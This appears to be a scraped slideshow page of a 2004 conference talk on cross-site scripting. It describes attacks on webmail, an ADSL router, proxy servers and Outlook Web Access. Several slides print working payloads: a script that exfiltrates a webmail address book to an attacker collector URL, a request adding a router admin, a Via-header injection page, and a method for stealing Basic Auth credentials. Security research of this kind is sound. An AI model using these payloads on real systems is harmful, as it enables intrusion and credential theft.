Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Not only a XSS

644 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Not only a XSS

  1. 1. FIST Conference March 2004 Not only a XSS Toni Cortès Martínez Infohacking Research
  2. 2. GUIDELINE Guideline  Introduction  XSS Today  Let’s see some XSS Infohacking Research 2 Not O
  3. 3. Introduction What’s this?  XSS?  How it works?  Where it works?  Application level security.  OK, but it’s only a XSS. Infohacking Research 3 Not O
  4. 4. XSS XSS (common attacks)  When somebody can exploit user inputs to get a non expected response.  The error it’s usually due to a poor filtering on user inputs and/or on the output from dynamically generated pages.  This could allow access to something restricted to user, for example: session credentials (cookies, session Id’s, etc.) Infohacking Research 4 Not O
  5. 5. How it works How it work’s Attacker must trick the victim to make a special HTTP request.  Usually exploited on web environment: 1) Webmails 2) Web forums 3) Any web application (dynamic content) that allows user interaction  Other applications that render some output in HTML (log viewers, mail clients)“HTML inyection”. (like ILLC techniques)  Exploits a non secure programming methodology.  The attacker usually wants the victim to do something:  Sends out some cookie (session or permanent)  Make an HTTP request for you ;)  The goal of XSS: We are on the victim environment. Infohacking Research 5 Not O
  6. 6. How it works How it works, example  We found a flaw on a server (ex: online bank with email service)  Construct a special request to explot this flaw (XSS), and obtain user credentials.  Send a message to the victim (with window.open, img src, etc.)  Wait for the user access and get the session track cookie.  Access to the online bank with user credentials (stolen cookie)  Now we are this user for a few time. Infohacking Research 6 Not O
  7. 7. Where it works Where it Works?  Any dynamic generated content dependant on user’s input it’s a potential XSS security hole.  Enter your name: Toni  Hi Toni  Simple example of explotation on a dynamic page:  Enter your name: Toni<script>alert(‘Hello XSS’)</script>  Hi Toni Infohacking Research 7 Not O
  8. 8. Application level security Nowadays, the application level security is one of the computer challenges.  Application level firewalls like HIVE or layer 7 filters.  Client side security it’s out of control for webmasters.  Servers can only do their best trying to filter any data coming from client side.  Fact: most of the XSS based attacks and vulnerabilities are easy to exploit.  No special skills are needed -> script kiddies.  XSS is useful to impersonate a user but doesn’t provide a direct or easy way of controlling a computer…umm, well, you still can do lot of things ;-) Infohacking Research 8 Not O
  9. 9. OK, but it’s only a XSS. OK, but it’s only a XSS…  Yes, XSS attacks seem to be harmless by itself, but they could open other attack vectors.  We can gain access to a web-admin tool. (IIS 6.0 Web Admin XSS vulnerability)  XSS, breaks with old HTTP session tracking methods: use of ID’s on the URL, cookies and also source IP based authentication. (Iplanet Messaging Server XSS vulnerability)  Combination of XSS with other flaws to launch a more complex attack: -HOTMAIL XSS and AV bypass -Microsoft User Domain Credendials access via OWA XSS (via XST) Infohacking Research 9 Not O
  10. 10. XSS Today XSS today  XSS, next generation attacks.  Proof of concept: HTTP redirection  XSS based worms & trojans  XSS worm  XSS trojan  Anyone could be affected by XSS Infohacking Research 10 Not O
  11. 11. XSS Next Generation XSS next generation attacks.  HTTP response redirection (information leak) (Zeus Web Admin XSS)  HTTP bouncing (Full interactive) … under construction  Infohacking Research 11 Not O
  12. 12. HTTP Redirection Proof of concept: HTTP redirection  Example of an evil link that steals address book of the victim ‘s webmail: http://<target>/vulnerable.cgi?variable=<script>function%20pedo(){var %20xmlHttp%20=%20new %20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("GET","http://<t arget>/address_book.cgi",false);xmlHttp.send();xmlDoc=xmlHttp.respons eText;window.open(“http://www.infohacking.com/data_collector.php? response=“+xmlDoc);} pedo();</script> Infohacking Research 12 Not O
  13. 13. HTTP Redirection Which means:http://<target>/vulnerable.cgi?variable= (server path to script inyection) <script> function pedo() {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("GET","http://<target>/address_book.cgi",false); // MAKE REQUEST xmlHttp.send(); xmlDoc=xmlHttp.responseText; // STORE RESPONSE window.open(“http://<attacker_site>/“+xmlDoc);} // SEND RESPONSE TO ATTACKER pedo(); </script> Note: we use “window.open” to send response in order to bypass “xmlHttp.open” security restrictions. Infohacking Research 13 Not O
  14. 14. XSS based worms & trojans General “features”  Spreading trough webmail servers  Self decrypting script routine  Can modify permanent cookies (trojan)  Can force session logout (D.o.S.)  Can impersonate the user  Can steal information (mail content, address book, etc)  Hard to be detected by AV software (encrypted payload)  If no user action is needed (as XSS on some field of the mail) then the spreading will be very fast! Infohacking Research 14 Not O
  15. 15. XSS worm How it works:  Once executed, the script will self decrypt and try to detect the source (Hotmail, Yahoo, Terra, …) or the webmail software (Iplanet, etc). It can be done with a simple “document.URL”, and comparing with some patterns.  If the source is known try to get address book  Filter only webmail addresses  Auto send routine Infohacking Research 15 Not O
  16. 16. XSS trojan How it works:  Once executed, the script will self decrypt and try to set a permanent cookie (will be stored on victim’s hard disk)  The modified cookie could change some option: it can set Chinese language as default ;-) (D.o.S.)  The modified cookie could redirect the victim to some place on the server that is controlled by the attacker (changing some profile setting in the cookie) As worms, trojan could try to spread away… Infohacking Research 16 Not O
  17. 17. Anyone can be affected by XSS Recent example: ViewCVS.py Affected sites: Sorceforge.net, Apache.org, Iptables.org. Those sites are well known to everybody, are probably they are managed by security concerned people… … anyway, they still can be exposed to XSS risks… Infohacking Research 17 Not O
  18. 18. Sourceforge.netInfohacking Research 18 Not O
  19. 19. Apache.orgInfohacking Research 19 Not O
  20. 20. Iptables.orgInfohacking Research 20 Not O
  21. 21. XSS Examples Some XSS examples from Infohacking Research  3Com 812 ADSL router -> we add a new admin  Inktomi Traffic Server -> all user vulnerables by this XSS  Iplanet Messaging Server -> session hijack  Microsoft ISA Server ->  OWA XSS -> Access to user credentials Infohacking Research 21 Not O
  22. 22. XSS on 3com ADSL router There is a lot of XSS present on the OCR812  http://<ip_of_OCR812>/<script>document.write("<b>WE_CAN_I NJECT_CODE</b>")</script> Infohacking Research 22 Not O
  23. 23. XSS on 3com ADSL router With XSS we can insert new users to our router  We can use windows.open, or <img src=..> to make our special request  / Forms/admin_telnet_add"+String.fromCharCode(63)+"uumUserN ame=infohacking&uumUserPassword= Infohacking Research 23 Not O
  24. 24. XSS on 3com ADSL router We can make the complete process if we know IP, user and password (by example, old admin) <html> <img src="<ip_or_name_of_OCR812>/legalizacion_marihuana.jpg"> <script type="text/javascript"> var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP") xmlHttp.open("GET", "<YOUR_FUCKING_REQUEST>,false) xmlHttp.setRequestHeader("Authorization:", "Basic User:Password(base64 encoded)") xmlHttp.send() </script> </html> Infohacking Research 24 Not O
  25. 25. Inktomi Traffic Server XSS Inktomi Traffic Server is a proxy cache used on several countryes by ISP  Also know in Spain as “Proxy cache de Telefónica”  A special request by a client passing through the Inktomi Traffic- Server causes an error page generated by the proxy. This dynamic error page is vulnerable to Cross Site Scripting...  Indirectly any server whose clients come trough the Traffic- Server and using cookies to track sessions are "vulnerable".  The client making the request IS UNABLE to distinguish what domain generated this code... Infohacking Research 25 Not O
  26. 26. Inktomi Traffic Server XSS Exploit?  We test it over 5.5.1 version.  Only need configure a proxy on ANY IP with port 80.  Make a special request. http://<spoofed_domain>:443/</em><script>alert()</script> We can see the script executed on our browser, “generated” by the spoofed domain. Now, we can access to cookies, and everything, like man in the middle attack. Infohacking Research 26 Not O
  27. 27. Iplanet messaging server XSS This webmail, Iplanet messaging server allow us hijack the SID.  This server allows "online" opening of file attachments. This means that any html file will be opened by the client browser in the IPlanet webmail domain context. Wonderful XSS ;-) Now we can explode this XSS with a html attach. With document.URL we obtain the SID and userid (located on the URL) With the SID, we gain access to all attach. http://<iplanet_host>/attach/file.html? sid=XYXYXYXYXYXYXY&mbox=INBOX&uid=XXXXX &number=2&filename=file.html Infohacking Research 27 Not O
  28. 28. Iplanet messaging server XSS But this is not easy…. Iplanet webmail include a IP session tracking. When we can use the hijacked SID?  If we are near the victim, behind a NAT device, we can access with his SID.  We can stole the session to all people who access trough a transparent proxy (like transparent proxy devices).  Or we can create a script to force user make request and redirect to us. Of course… they don’t see anything… (see above) Note: a lot of web server use the same session-cookie on both http and https domains. (This note is for the online bank developers). Infohacking Research 28 Not O
  29. 29. Microsoft ISA Server XSS This example shows an XSS exploited using headers  When we try to go an unreachable url trought ISA Server. ISA generate an error page, showing some data (the content of “via header”).  We fix this header.  Now we can request a non-existent URL into an existent domain. (usually server use the same cookie on all his domain)  Steal cookies   Access.  We don’t need a flaw on the server code. Use ISA Server instead. Infohacking Research 29 Not O
  30. 30. ISA Server Exploit<html><body><script type="text/javascript">alert("Click OK then wait for a few seconds...")var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP")xmlHttp.open("GET", "http://www.infohacking.com:113", false)xmlHttp.setRequestHeader("Via", "CODE_INJECTED_IN_VIA_HEADER<script>alert ("ISA_SERVER_XSS_by_INFOHACKING")</script>")xmlHttp.send()xmlDoc=xmlHttp.responseTextdocument.write(xmlHttp.responseText)</script></body></html> Infohacking Research 30 Not O
  31. 31. OWA XSS What we have here?  With OWA you can see an HTML formatted e-mail  A user must click on a special link for this purpose in the webmail interface, and an alert will pop-up.  To avoid people executing malicious content in the client browser, the OWA will try to filter the content of the mail. Good, but… no enough. Infohacking Research 31 Not O
  32. 32. Disabling OWA filtering The URL to view an HTML formatted mail is something like this:http://<IP_or_name_of_the_server>/exchange/<username>/<inbox_name>/<su bject>.EML/1_multipart/2_text.htm?Security=1Good name for a parameter, other name maybe “change_this_for_fucking_us” We only need to quit this parameter, and OWA don’t apply the filter. Infohacking Research 32 Not O
  33. 33. OWA XSS Obtaining data to create our special link.  We need IP or hostname of the server, user name and subject.  All this we can found on the “referer” header of an HTTP request coming from a link in the body of message. <img src="http://<site_of_the_attacker">  Now with referrer, we can send our attack.  We have the IP or hostname of server (from referrer)  We have the user name (from referer)  We know the subject  We create a link in the body of message, without the “security” parameter. (link to the same message without security parameter) Infohacking Research 33 Not O
  34. 34. OWA, Stolen credentials Nothing else?  OWA uses cookies to track the HTTP session, but also uses "Basic Auth" for... more security? ;-)  This “Basic Auth” (-> base64 encoded user:passwd) contains the user credentials for this domain.  To access the "Basic Auth" header, the easiest way is via an http "TRACE" request...and the IIS (Internet Information Server) by default will allow those kind of requests. Infohacking Research 34 Not O
  35. 35. XSS That’s all folks?? Of course, as always, imagination of the attacker is the only limit... much more fun is possible. Thanks For Your attention. Infohacking Research 35 Not O
  36. 36. FIST Conference March 2004 Not only a XSS© Toni Cortes Martinez & Hugo Vazquez Carames Infohacking Research Barcelona, 7 May 2004

×